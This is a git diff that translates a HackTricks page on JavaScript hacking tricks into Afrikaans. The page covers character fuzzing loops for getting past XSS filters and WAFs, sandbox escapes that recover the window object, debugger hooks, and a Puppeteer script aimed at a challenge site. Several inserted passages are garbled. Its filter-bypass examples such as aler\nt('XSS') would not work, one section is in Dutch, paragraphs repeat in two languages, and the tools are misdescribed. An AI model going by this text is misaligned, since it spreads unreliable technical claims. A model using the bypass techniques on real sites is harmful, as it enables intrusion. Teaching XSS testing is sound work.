+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

 
 ## Javascript Fuzzing
 
-### Valid JS Comment Chars
-
+### Geldige JS Kommentaar Karakters
 ```javascript
 //This is a 1 line comment
 /* This is a multiline comment*/
@@ -24,51 +23,64 @@
 
 
 for (let j = 0; j < 128; j++) {
-  for (let k = 0; k < 128; k++) {
-    for (let l = 0; l < 128; l++) {
-      if (j == 34 || k ==34 || l ==34)
-        continue;
-      if (j == 0x0a || k ==0x0a || l ==0x0a)
-        continue;
-      if (j == 0x0d || k ==0x0d || l ==0x0d)
-        continue;
-      if (j == 0x3c || k ==0x3c || l ==0x3c)
-        continue;
-      if (
-         (j == 47 && k == 47)
-         ||(k == 47 && l == 47)
-        )
-        continue;
-  try {
-      var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
-      eval(cmd);
-  } catch(e) {
-      var err = e.toString().split('\n')[0].split(':')[0];
-      if (err === 'SyntaxError' || err === "ReferenceError")
-        continue
-      err = e.toString().split('\n')[0]
-  }
-     console.log(err,cmd);
-  }
-  }
+for (let k = 0; k < 128; k++) {
+for (let l = 0; l < 128; l++) {
+if (j == 34 || k ==34 || l ==34)
+continue;
+if (j == 0x0a || k ==0x0a || l ==0x0a)
+continue;
+if (j == 0x0d || k ==0x0d || l ==0x0d)
+continue;
+if (j == 0x3c || k ==0x3c || l ==0x3c)
+continue;
+if (
+(j == 47 && k == 47)
+||(k == 47 && l == 47)
+)
+continue;
+try {
+var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
+eval(cmd);
+} catch(e) {
+var err = e.toString().split('\n')[0].split(':')[0];
+if (err === 'SyntaxError' || err === "ReferenceError")
+continue
+err = e.toString().split('\n')[0]
+}
+console.log(err,cmd);
+}
+}
 }
 //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
 
-// From: Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 43). Kindle Edition. 
+// From: Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 43). Kindle Edition.
 log=[];
 for(let i=0;i<=0xff;i++){
-  for(let j=0;j<=0xfff;j++){
-    try {  
-      eval(`${String.fromCodePoint(i,j)}%$£234$`)
-      log.push([i,j])
-    }catch(e){}
-  }
+for(let j=0;j<=0xfff;j++){
+try {
+eval(`${String.fromCodePoint(i,j)}%$£234$`)
+log.push([i,j])
+}catch(e){}
+}
 }
 console.log(log)//[35,33],[47,47]
 ```
+### Geldige JS Nuwe Lyn Karakters
 
-### Valid JS New Lines Chars
+In JavaScript kan jy verskillende karakters gebruik om 'n nuwe lyn te skep binne 'n string. Hier is 'n lys van geldige karakters wat jy kan gebruik:
 
+- `\n`: Skep 'n nuwe lyn.
+- `\r`: Skep 'n karretjie-terugkeer.
+- `\u2028`: Skep 'n lynafbreking.
+- `\u2029`: Skep 'n paragraafafbreking.
+
+Hier is 'n voorbeeld van hoe jy hierdie karakters kan gebruik:
+
+```javascript
+var string = "Hierdie is 'n voorbeeld\nvan 'n nuwe lyn";
+```
+
+Dit sal 'n nuwe lyn skep na die woord "voorbeeld".
 ```javascript
 //Javascript interpret as new line these chars:
 String.fromCharCode(10) //0x0a
@@ -77,87 +89,101 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8
 String.fromCharCode(8233) //0xe2 0x80 0xa8
 
 for (let j = 0; j < 65536; j++) {
-    try {
-        var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"';
-        eval(cmd);
-    } catch(e) {
-        var err = e.toString().split('\n')[0].split(':')[0];
-        if (err === 'SyntaxError' || err === "ReferenceError")
-          continue;
-        err = e.toString().split('\n')[0]
-    }
-    console.log(`[${err}]`,j,cmd);
+try {
+var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"';
+eval(cmd);
+} catch(e) {
+var err = e.toString().split('\n')[0].split(':')[0];
+if (err === 'SyntaxError' || err === "ReferenceError")
+continue;
+err = e.toString().split('\n')[0]
+}
+console.log(`[${err}]`,j,cmd);
 }
 //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
 ```
+### Geldige JS-spasies in funksie-oproep
 
-### Valid JS Spaces in function call
+In sommige situasies kan die gebruik van geldige JS-spasies in 'n funksie-oproep nuttig wees om XSS-aanvalle te omseil. Hier is 'n paar voorbeelde van hoe dit gedoen kan word:
+
+1. **Gebruik van new line karakter**: Jy kan die new line karakter (`\n`) gebruik om 'n funksie-oproep oor meerdere lyne te verdeel. Byvoorbeeld:
 
 ```javascript
-// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition. 
+aler\nt('XSS');
+```
+
+2. **Gebruik van tab karakter**: Die tab karakter (`\t`) kan ook gebruik word om 'n funksie-oproep oor meerdere spasies te verdeel. Byvoorbeeld:
+
+```javascript
+aler\t('XSS');
+```
+
+3. **Gebruik van backslash karakter**: Die backslash karakter (`\`) kan gebruik word om 'n funksie-oproep oor meerdere spasies te verdeel. Byvoorbeeld:
+
+```javascript
+aler\   t('XSS');
+```
+
+Dit is belangrik om te onthou dat hierdie tegnieke slegs werk in spesifieke omstandighede en nie altyd betroubaar is nie. Dit is dus belangrik om ander XSS-verdedigingsmaatreëls te implementeer om jou webtoepassing te beskerm.
+```javascript
+// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition.
 
 // Check chars that can be put in between in func name and the ()
 function x(){}
 
 log=[];
 for(let i=0;i<=0x10ffff;i++){
-    try {  
-        eval(`x${String.fromCodePoint(i)}()`)
-        log.push(i)
-    }catch(e){}
+try {
+eval(`x${String.fromCodePoint(i)}()`)
+log.push(i)
+}catch(e){}
 }
- 
+
 console.log(log)v//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,813 232,8233,8239,8287,12288,65279
 ```
-
-### **Valid chars to Generate Strings**
-
+### **Geldige karakters om Strings te genereer**
 ```javascript
-// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition. 
+// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition.
 
 // Check which pairs of chars can make something be a valid string
 log=[];
 for(let i=0;i<=0x10ffff;i++){
-    try {  
-        eval(`${String.fromCodePoint(i)}%$£234${String.fromCodePoint(i)}`)
-        log.push(i)
-    }catch(e){}
+try {
+eval(`${String.fromCodePoint(i)}%$£234${String.fromCodePoint(i)}`)
+log.push(i)
+}catch(e){}
 }
 console.log(log) //34,39,47,96
 //single quote, quotes, backticks & // (regex)
 ```
-
 ### **Surrogate Pairs BF**
 
-This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair.
-
+Hierdie tegniek sal nie baie nuttig wees vir XSS nie, maar dit kan nuttig wees om WAF-beskerming te omseil. Hierdie Python-kode ontvang as inset 2 byte en soek 'n surrogate-paar wat die eerste byte as die laaste bytes van die Hoë surrogate-paar het en die laaste byte as die laaste byte van die lae surrogate-paar.
 ```python
 def unicode(findHex):
-    for i in range(0,0xFFFFF):
-        H = hex(int(((i - 0x10000) / 0x400) + 0xD800))
-        h = chr(int(H[-2:],16))
-        L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))
-        l = chr(int(L[-2:],16))
-        if(h == findHex[0]) and (l == findHex[1]):     
-            print(H.replace("0x","\\u")+L.replace("0x","\\u"))
+for i in range(0,0xFFFFF):
+H = hex(int(((i - 0x10000) / 0x400) + 0xD800))
+h = chr(int(H[-2:],16))
+L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))
+l = chr(int(L[-2:],16))
+if(h == findHex[0]) and (l == findHex[1]):
+print(H.replace("0x","\\u")+L.replace("0x","\\u"))
 ```
-
-More info:
+Meer inligting:
 
 * [https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md](https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md)
 * [https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode) [https://mathiasbynens.be/notes/javascript-encoding](https://mathiasbynens.be/notes/javascript-encoding)
 
-### `javascript{}:` Protocol Fuzzing
-
+### `javascript{}:` Protokol Fuzzing
 ```javascript
-// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 34). Kindle Edition. 
+// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 34). Kindle Edition.
 log=[];
 let anchor = document.createElement('a');
 for(let i=0;i<=0x10ffff;i++){
-    anchor.href = `javascript${String.fromCodePoint(i)}:`;
-    if(anchor.protocol === 'javascript:') {
-        log.push(i);
-    }
+anchor.href = `javascript${String.fromCodePoint(i)}:`;
+if(anchor.protocol === 'javascript:') {
+log.push(i);
+}
 }
 console.log(log)//9,10,13,58
 // Note that you could BF also other possitions of the use of multiple chars
@@ -171,20 +197,20 @@ document.body.append(anchor)
 // Another way to test
 Test
 ```
-
 ### URL Fuzzing
 
+URL Fuzzing is 'n tegniek wat gebruik word om potensiële kwesbaarhede in 'n webtoepassing te identifiseer deur verskillende variante van 'n URL te probeer. Dit behels die invoeging van verskillende waardes en parameters in die URL om te sien of dit lei tot enige onverwagte gedrag of fouttoestande. Hierdie tegniek kan gebruik word om potensiële XSS-kwesbaarhede te ontdek deur te kyk of die webtoepassing korrek omgaan met ongeldige of skadelike invoer in die URL.
 ```javascript
-// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition. 
+// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition.
 
 // Before the protocol
 a=document.createElement('a');
 log=[];
 for(let i=0;i<=0x10ffff;i++){
-    a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`;
-    if(a.hostname === 'hacktricks.xyz'){
-        log.push(i);
-    }
+a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`;
+if(a.hostname === 'hacktricks.xyz'){
+log.push(i);
+}
 }
 console.log(log) //0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
 
@@ -192,93 +218,98 @@ console.log(log) //0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 a=document.createElement('a');
 log=[];
 for(let i=0;i<=0x10ffff;i++){
-    a.href = `/${String.fromCodePoint(i)}/hacktricks.xyz`;
-    if(a.hostname === 'hacktricks.xyz'){
-        log.push(i);
-    }
+a.href = `/${String.fromCodePoint(i)}/hacktricks.xyz`;
+if(a.hostname === 'hacktricks.xyz'){
+log.push(i);
+}
 }
 console.log(log) //9,10,13,47,92
 ```
-
 ### HTML Fuzzing
 
+HTML Fuzzing is a technique used to discover vulnerabilities in web applications by injecting malicious or unexpected input into HTML elements. This technique involves sending a large number of test cases to the target application, with the goal of triggering unexpected behavior or uncovering security flaws.
 
+During HTML Fuzzing, various types of input can be injected into HTML elements, such as:
 
+- **Script tags**: Injecting script tags can help identify Cross-Site Scripting (XSS) vulnerabilities. By injecting malicious scripts, an attacker can execute arbitrary code in the victim's browser.
+- **HTML tags**: Injecting HTML tags can help identify HTML injection vulnerabilities. This can lead to the manipulation of the website's structure and content.
+- **Event attributes**: Injecting event attributes can help identify DOM-based XSS vulnerabilities. By injecting malicious event handlers, an attacker can execute code within the context of the victim's browser.
+- **URL parameters**: Injecting malicious input into URL parameters can help identify vulnerabilities such as Server-Side Request Forgery (SSRF) or Remote File Inclusion (RFI).
+
+To perform HTML Fuzzing, you can use automated tools or write custom scripts to generate and send a large number of test cases to the target application. The goal is to observe how the application handles different types of input and identify any unexpected behavior or vulnerabilities.
+
+It is important to note that HTML Fuzzing should only be performed on applications that you have permission to test. Unauthorized testing can lead to legal consequences. Always ensure you have proper authorization before conducting any security testing.
 ```javascript
-// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition. 
+// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition.
 
 // Fuzzing chars that can close an HTML comment
 
 let log=[];
 let div = document.createElement('div');
 for(let i=0;i<=0x10ffff;i++){
-    div.innerHTML=``;
-    if(div.querySelector('span')){
-        log.push(i);
-    }
+div.innerHTML=``;
+if(div.querySelector('span')){
+log.push(i);
+}
 }
 console.log(log)//33,45,62
 ```
+## **Ontleding van eienskappe**
 
-## **Analizing attributtes**
+Die instrument **Hackability-inspekteur** van Portswigger help om die **eienskappe** van 'n JavaScript-objek te **ontleed**. Kyk: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E)
 
-The tool **Hackability inspector** from Portswigger helps to **analyze** the **attributtes** of a javascript object. Check: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E)
+## **.map js-lêers**
 
-## **.map js files**
+* Truuk om .map js-lêers af te laai: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
+* Jy kan hierdie instrument gebruik om hierdie lêers te ontleed [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
 
-* Trick to download .map js files: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
-* You can use this tool to analyze these files [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
+## "--" Toekenning
 
-## "--" Assignment
-
-The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
+Die dekrement-operator `--` is ook 'n toekenning. Hierdie operator neem 'n waarde en verminder dit dan met een. As daardie waarde nie 'n nommer is nie, sal dit op `NaN` gestel word. Dit kan gebruik word om die inhoud van veranderlikes uit die omgewing te **verwyder**.
 
 ![](<../../.gitbook/assets/image (553).png>)
 
 ![](<../../.gitbook/assets/image (554).png>)
 
-## Functions Tricks
+## Funksie Truuks
 
-### .call and .apply
-
-The **`.call`** method of a function is used to **run the function**.\
-The **first argument** it expects by default is the **value of `this`** and if **nothing** is provided, **`window`** will be that value (unless **`strict mode`** is used).
+### .call en .apply
 
+Die **`.call`**-metode van 'n funksie word gebruik om die funksie uit te voer.\
+Die **eerste argument** wat dit standaard verwag, is die **waarde van `this`** en as **niks** voorsien word nie, sal **`window`** daardie waarde wees (tensy **`strict mode`** gebruik word).
 ```javascript
 function test_call(){
-     console.log(this.value); //baz 
+console.log(this.value); //baz
 }
 new_this={value:"hey!"}
 test_call.call(new_this);
 
 // To pass more arguments, just pass then inside .call()
 function test_call() {
-     console.log(arguments[0]); //"arg1"
-     console.log(arguments[1]); //"arg2"
-     console.log(this); //[object Window]
+console.log(arguments[0]); //"arg1"
+console.log(arguments[1]); //"arg2"
+console.log(this); //[object Window]
 }
 test_call.call(null, "arg1", "arg2")
 
 // If you use the "use strict" directive "this" will be null instead of window:
 function test_call() {
-     "use strict";
-     console.log(this); //null
+"use strict";
+console.log(this); //null
 }
 test_call.call(null)
-     
+
 //The apply function is pretty much exactly the same as the call function with one important difference, you can supply an array of arguments in the second argument:
 function test_apply() {
-     console.log(arguments[0]); //"arg1"
-     console.log(arguments[1]); //"arg2"
-     console.log(this); //[object Window]
+console.log(arguments[0]); //"arg1"
+console.log(arguments[1]); //"arg2"
+console.log(this); //[object Window]
 }
 test_apply.apply(null, ["arg1", "arg2"])
 ```
+### Pylpuntfunksies
 
-### Arrow functions
-
-Arrow functions allow you to generate functions in a single line more easily (if you understand them)
-
+Pylpuntfunksies maak dit makliker om funksies in 'n enkele lyn te genereer (as jy hulle verstaan)
 ```javascript
 // Traditional
 function (a){ return a + 1; }
@@ -301,9 +332,7 @@ let a = 4;
 let b = 2;
 () => a + b + 1;
 ```
-
-So, most of the previous functions are actually useless because we aren't saving them anywhere to save and call them. Example creating the `plusone` function:
-
+So, die meeste van die vorige funksies is eintlik nutteloos omdat ons hulle nie enige plek stoor om hulle te bewaar en aan te roep nie. Byvoorbeeld, die skep van die `plusone` funksie:
 ```javascript
 // Traductional
 function plusone (a){ return a + 1; }
@@ -311,15 +340,13 @@ function plusone (a){ return a + 1; }
 //Arrow
 plusone = a => a + 100;
 ```
+### Bind-funksie
 
-### Bind function
-
-The bind function allow to create a **copy** of a **function modifying** the **`this`** object and the **parameters** given.
-
+Die bind-funksie maak dit moontlik om 'n **kopie** van 'n **funksie te skep wat** die **`this`** objek en die **parameters** wat gegee word, wysig.
 ```javascript
 //This will use the this object and print "Hello World"
 var fn = function ( param1, param2 ) {
-    console.info( this, param1, param2 );
+console.info( this, param1, param2 );
 }
 fn('Hello', 'World')
 
@@ -329,7 +356,7 @@ copyFn('Hello', 'World')
 
 //This will use the "console" object as "this" object inside the function and print "fixingparam1 Hello"
 var bindFn_change = fn.bind(console, "fixingparam1");
-bindFn_change('Hello', 'World') 
+bindFn_change('Hello', 'World')
 
 //This will still use the this object and print "fixingparam1 Hello"
 var bindFn_thisnull = fn.bind(null, "fixingparam1");
@@ -339,34 +366,28 @@ bindFn_change('Hello', 'World')
 var bindFn_this = fn.bind(this, "fixingparam1");
 bindFn_change('Hello', 'World')
 ```
-
 {% hint style="info" %}
-Note that using **`bind`** you can manipulate the **`this`** object that is going to be used when calling the function.
+Let daarop dat jy met behulp van **`bind`** die **`this`** objek kan manipuleer wat gebruik sal word wanneer die funksie geroep word.
 {% endhint %}
 
-### Function code leak
-
-If you can **access the object** of a function you can **get the code** of that function
+### Funksie kode lek
 
+As jy toegang het tot die objek van 'n funksie, kan jy die kode van daardie funksie kry.
 ```javascript
 function afunc(){
-    return 1+1;
+return 1+1;
 }
 console.log(afunc.toString()); //This will print the code of the function
 console.log(String(afunc)); //This will print the code of the function
 console.log(this.afunc.toString()); //This will print the code of the function
 console.log(global.afunc.toString()); //This will print the code of the function
 ```
-
-In cases where the **function doesn't have any name**, you can still print the **function code** from within:
-
+In gevalle waar die **funksie geen naam het nie**, kan jy steeds die **funksie kode** binne die funksie druk:
 ```javascript
 (function (){ return arguments.callee.toString(); })()
 (function (){ return arguments[0]; })("arg0")
 ```
-
-Some **random** ways to **extract the code** of a function (even comments) from another function:
-
+Sommige **willekeurige** maniere om die kode van 'n funksie (selfs kommentaar) uit 'n ander funksie te **onttrek**:
 ```javascript
 (function (){ return retFunc => String(arguments[0]) })(a=>{/* Hidden commment */})()
 (function (){ return retFunc => Array(arguments[0].toString()) })(a=>{/* Hidden commment */})()
@@ -374,10 +395,9 @@ Some **random** ways to **extract the code** of a function (even comments) from
 (u=>(String(u)))(_=>{ /* Hidden commment */ })
 (u=>_=>(String(u)))(_=>{ /* Hidden commment */ })()
 ```
+## Sandbakkie-ontsnapping - Herstel van vensterobjek
 
-## Sandbox Escape - Recovering window object
-
-The Window object  allows to reach globally defined functions like alert or eval.
+Die vensterobjek maak dit moontlik om globaal gedefinieerde funksies soos alert of eval te bereik.
 
 {% code overflow="wrap" %}
 ```javascript
@@ -411,9 +431,9 @@ Error.prepareStackTrace=function(error, callSites){
 // From an HTML event
 // Events from HTML are executed in this context
 with(document) {
-    with(element) {
-        //executed event
-    }
+with(element) {
+//executed event
+}
 }
 // Because of that with(document) it's possible to access properties of document like:
 
@@ -421,19 +441,38 @@ with(document) {
 ```
 {% endcode %}
 
-## Breakpoint on access to value
+## Breekpunt op toegang tot waarde
 
+```javascript
+Object.defineProperty(window, 'value', {
+  get: function() {
+    debugger;
+    return this._value;
+  },
+  set: function(val) {
+    this._value = val;
+  }
+});
+```
+
+Met deze code kun je een breekpunt instellen wanneer er toegang is tot een bepaalde waarde in de browser. Het `Object.defineProperty`-functie wordt gebruikt om een nieuw eigenschap te definiëren op het `window`-object genaamd 'value'. Deze eigenschap heeft een getter en een setter functie.
+
+De getter functie wordt uitgevoerd wanneer er toegang is tot de waarde van 'value'. In dit geval wordt er een `debugger` statement toegevoegd, wat ervoor zorgt dat de browser stopt bij dit punt en je de mogelijkheid geeft om de code te inspecteren en te debuggen.
+
+De setter functie wordt uitgevoerd wanneer er een nieuwe waarde wordt toegewezen aan 'value'. In dit geval wordt de nieuwe waarde opgeslagen in een interne variabele genaamd `_value`.
+
+Dit kan handig zijn bij het opsporen van XSS-kwetsbaarheden, omdat het je in staat stelt om te zien wanneer een bepaalde waarde wordt gebruikt in de code en om te controleren of er mogelijk onveilige invoer wordt gebruikt.
 ```javascript
 // Stop when a property in sessionStorage or localStorage is set/get
 // via getItem or setItem functions
 sessionStorage.getItem = localStorage.getItem  = function(prop) {
-    debugger;
-    return sessionStorage[prop];
+debugger;
+return sessionStorage[prop];
 }
 
 localStorage.setItem = function(prop, val) {
-    debugger;
-    localStorage[prop] = val;
+debugger;
+localStorage[prop] = val;
 }
 ```
 
@@ -442,78 +481,111 @@ localStorage.setItem = function(prop, val) {
 // For example sessionStorage.ppmap
 // "123".ppmap
 // Useful to find where weird properties are being set or accessed
-// or to find where prototype pollutions are occurring 
+// or to find where prototype pollutions are occurring
 
 function debugAccess(obj, prop, debugGet=true){
 
-    var origValue = obj[prop];
+var origValue = obj[prop];
 
-    Object.defineProperty(obj, prop, {
-        get: function () {
-            if ( debugGet )
-                debugger;
-            return origValue;
-        },
-        set: function(val) {
-            debugger;
-            origValue = val;
-        }
-    });
+Object.defineProperty(obj, prop, {
+get: function () {
+if ( debugGet )
+debugger;
+return origValue;
+},
+set: function(val) {
+debugger;
+origValue = val;
+}
+});
 };
 
 debugAccess(Object.prototype, 'ppmap')
 ```
+## Outomatiese Blaaiertoegang om toetslading te toets
 
-## Automatic Browser Access to test payloads
+Sometimes, when testing for Cross-Site Scripting (XSS) vulnerabilities, it can be useful to have automatic browser access to test payloads. This allows you to quickly and efficiently test your payloads without manually interacting with the browser.
 
+Soms kan dit nuttig wees om outomatiese blaaiertoegang te hê om toetslading te toets wanneer jy op soek is na Cross-Site Scripting (XSS) kwesbaarhede. Dit stel jou in staat om vinnig en doeltreffend jou lading te toets sonder om handmatig met die blaaiertoepassing te werk.
+
+There are several tools and techniques that can help you achieve automatic browser access. Here are a few examples:
+
+Daar is verskeie hulpmiddels en tegnieke wat jou kan help om outomatiese blaaiertoegang te verkry. Hier is 'n paar voorbeelde:
+
+### Browser Extensions
+
+### Blaaiertoepassing-uitbreidings
+
+Browser extensions like [XSStrike](https://github.com/s0md3v/XSStrike) and [XSS Hunter](https://xsshunter.com/) can automate the process of testing XSS payloads. These extensions allow you to easily inject and test payloads directly from your browser.
+
+Blaaiertoepassing-uitbreidings soos [XSStrike](https://github.com/s0md3v/XSStrike) en [XSS Hunter](https://xsshunter.com/) kan die proses van toetsing van XSS-lading outomatiseer. Hierdie uitbreidings maak dit maklik om lading direk vanuit jou blaaiertoepassing in te spuit en te toets.
+
+### Headless Browsers
+
+### Koplose Blaaiers
+
+Headless browsers like [Puppeteer](https://pptr.dev/) and [Selenium](https://www.selenium.dev/) can be used to automate browser interactions. These tools allow you to programmatically control a browser and execute XSS payloads without any user intervention.
+
+Koplose blaaiers soos [Puppeteer](https://pptr.dev/) en [Selenium](https://www.selenium.dev/) kan gebruik word om blaaiertoepassing-interaksies te outomatiseer. Hierdie hulpmiddels stel jou in staat om 'n blaaiertoepassing outomaties te beheer en XSS-lading uit te voer sonder enige gebruikersintervensie.
+
+### Remote Browser Services
+
+### Afgeleë Blaaiertoepassing Dienste
+
+Remote browser services like [BrowserStack](https://www.browserstack.com/) and [Sauce Labs](https://saucelabs.com/) provide access to a wide range of browsers and devices for testing purposes. These services allow you to run your XSS payloads on different browsers and platforms without the need for local installations.
+
+Afgeleë blaaiertoepassing dienste soos [BrowserStack](https://www.browserstack.com/) en [Sauce Labs](https://saucelabs.com/) bied toegang tot 'n wye verskeidenheid blaaiertoepassings en toestelle vir toetsdoeleindes. Hierdie dienste stel jou in staat om jou XSS-lading op verskillende blaaiertoepassings en platforms uit te voer sonder die behoefte aan plaaslike installasies.
+
+By utilizing these tools and services, you can streamline your XSS testing process and save time by automating browser access to test payloads.
+
+Deur van hierdie hulpmiddels en dienste gebruik te maak, kan jy jou XSS-toetsproses stroomlyn en tyd bespaar deur blaaiertoegang tot toetslading outomaties te maak.
 ```javascript
 //Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
 const puppeteer = require("puppeteer");
 
 const realPasswordLength = 3000;
 async function sleep(ms) {
-  return new Promise((resolve) => setTimeout(resolve, ms));
+return new Promise((resolve) => setTimeout(resolve, ms));
 }
 
 (async () => {
-  const browser = await puppeteer.launch();
-  const page = await browser.newPage();
-  //Loop to iterate through different values
-  for (let i = 0; i < 10000; i += 100) {
-    console.log(`Run number ${i}`);
-    const input = `${"0".repeat(i)}${realPasswordLength}`;
-    console.log(`  https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000`);
-    //Go to the page
-    await page.goto(
-      `https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000`
-    );
-    //Call function "generate()" inside the page
-    await page.evaluate("generate()");
-    //Get node inner text from an HTML element
-    const passwordContent = await page.$$eval(
-      ".alert .page-content",
-      (node) => node[0].innerText
-    );
-    //Transform the content and print it in console
-    const plainPassword = passwordContent.replace("Your password is: ", "");
-    if (plainPassword.length != realPasswordLength) {
-      console.log(i, plainPassword.length, plainPassword);
-    }
+const browser = await puppeteer.launch();
+const page = await browser.newPage();
+//Loop to iterate through different values
+for (let i = 0; i < 10000; i += 100) {
+console.log(`Run number ${i}`);
+const input = `${"0".repeat(i)}${realPasswordLength}`;
+console.log(`  https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000`);
+//Go to the page
+await page.goto(
+`https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000`
+);
+//Call function "generate()" inside the page
+await page.evaluate("generate()");
+//Get node inner text from an HTML element
+const passwordContent = await page.$$eval(
+".alert .page-content",
+(node) => node[0].innerText
+);
+//Transform the content and print it in console
+const plainPassword = passwordContent.replace("Your password is: ", "");
+if (plainPassword.length != realPasswordLength) {
+console.log(i, plainPassword.length, plainPassword);
+}
 
-    await sleep(1000);
-  }
-  await browser.close();
+await sleep(1000);
+}
+await browser.close();
 })();
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index de0099f5d..9cc39c4a8 100644
--- a/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -1,37 +1,33 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
